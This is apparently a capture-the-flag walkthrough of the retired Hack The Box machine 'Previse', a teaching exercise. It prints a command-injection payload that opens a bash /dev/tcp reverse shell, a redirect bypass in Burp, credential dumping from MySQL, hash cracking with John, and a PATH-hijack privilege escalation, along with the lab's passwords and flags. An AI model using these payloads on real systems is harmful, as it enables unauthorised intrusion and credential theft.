Previse

Name: Previse
Release Date: 07 Aug 2021
Retire Date: 08 Jan 2022
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
onurshin 00 days, 00 hours, 23 mins, 06 seconds
zime 00 days, 00 hours, 26 mins, 10 seconds
Creator: m4lwhere
Pentest Workshop PDF: Previse.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.104

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have ports SSH TCP 22 and HTTP TCP 80 that are green. Let's run Gobuster and navigate to http://10.10.11.104 while that runs.

  
┌──(kali㉿kali)-[~/Desktop/HTB/Previse]
└─$ gobuster dir -u http://10.10.11.104 -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "php" -s "200,204,301,302,307"
 -t50 -o previse.out

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.11.104
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/01/23 14:16:45 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/download.php         (Status: 302) [Size: 0] [--> login.php]   
/login.php            (Status: 200) [Size: 2224]                
/files.php            (Status: 302) [Size: 4914] [--> login.php]
/header.php           (Status: 200) [Size: 980]                 
/nav.php              (Status: 200) [Size: 1248]                
/footer.php           (Status: 200) [Size: 217]                 
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php           (Status: 302) [Size: 2966] [--> login.php]              
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/] 
/logout.php           (Status: 302) [Size: 0] [--> login.php]                 
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]              
/config.php           (Status: 200) [Size: 0]                                 
/logs.php             (Status: 302) [Size: 0] [--> login.php]                 
/server-status        (Status: 403) [Size: 277]                               
                                                                              
===============================================================
2022/01/23 14:34:44 Finished
===============================================================

Looking at nav.php, we find a navigation bar that allows us to create a new user. Trying to create the account through a browser keeps redirecting us, but if we intercept the request using Burp and NOT follow the redirect, we can access the accounts.php page that will allow us to create the account we need.

From that code, we know that we need to POST a username, password, confirm, and submit field. Using:

 

username=neocount&password=password&confirm=password&submit=

 

should do the trick to create a new user. Let's see if we can change the 302 response to a 200 response. Navigate directly to http://10.10.11.104/accounts.php and when Burp intercepts it, click the "hamburger" button, go to "Do Intercept", and select "Response to this request" and click Forward. When that comes up, change the 302 Found to 200 Found and click Forward.  Now you can interact with the account creation page.

Now that we have an account created, let's log in and see what we can use. There is a site backup file under the Files tab. Downloading that we can look through and hopefully find a foothold. For example, in the log.php file, we see that it is using an exec() function. PHP exec() functions allow for system commands to be run, in this case, a log_process.py script, but can be hijacked for us to, hopefully, get a reverse shell foothold.

Under the Management Menu > Log Data, there is a method of getting log data that uses that function, which means we should be able to use it to make a reverse shell callback if we define the delim using:

 

delim=%3bbash+-c+'bash+-i+>%26+/dev/tcp/<YOUR TUN0 IP>/1337+0>%261'%3b

 

and start a netcat listener on your machine. The Deliminator field is a drop down, so we need to intercept it with Burp again.

The directory we are dropped in (/var/www/html) has a config.php file. Cat'ing it gives us mysql credentials. Quick find.

 

root:mySQL_p@ssw0rd!:)

Connecting to mysql, we check out the user tables in the databases.

 

mysql -u root -p'mySQL_p@ssw0rd!:)' -e 'show databases;'

mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'show tables;'

mysql -u root -p'mySQL_p@ssw0rd!:)' previse -e 'select * from accounts;'

 

Looking into accounts.php again, we find the exact method of encryption.

 

 $hash = crypt($password, '$1$🧂llol$');
    $db = connectDB();
    if ($db === false) {
       die("ERROR: Could not connect. " . $db->connect_error);
    }                    
    $sql = "INSERT INTO accounts (username, password) VALUES ('{$username}','{$hash}')";
    $result = $db->query($sql);
 

Now, we just need to enter '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' into a hash file and crack it using John with an md5crypt format.

 

echo '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' > hash && john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

 

m4lwhere:ilovecody112235!

First, grab the user.txt flag and start privesc enumeration.

 

m4lwhere@previse:~$ cat user.txt 
9618ea8ff392dadb2ed985a8a0b807cc
 

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ 
 

Unfortunately, access_backup.sh is owned by root so we cannot modify it. However, we can read it and it uses gzip to create the backup.  While we can't modify the script, we can create a new gzip and add it to the PATH using:

 

cd /tmp

export PATH=/tmp:$PATH

echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip

chmod +x gzip

sudo /opt/scripts/access_backup.sh

./bash -p

bash-4.4# cat /root/root.txt 
1a0eebd484c0b843def6a26ba65afda8

 

Odd box. Grab the flag and celebrate!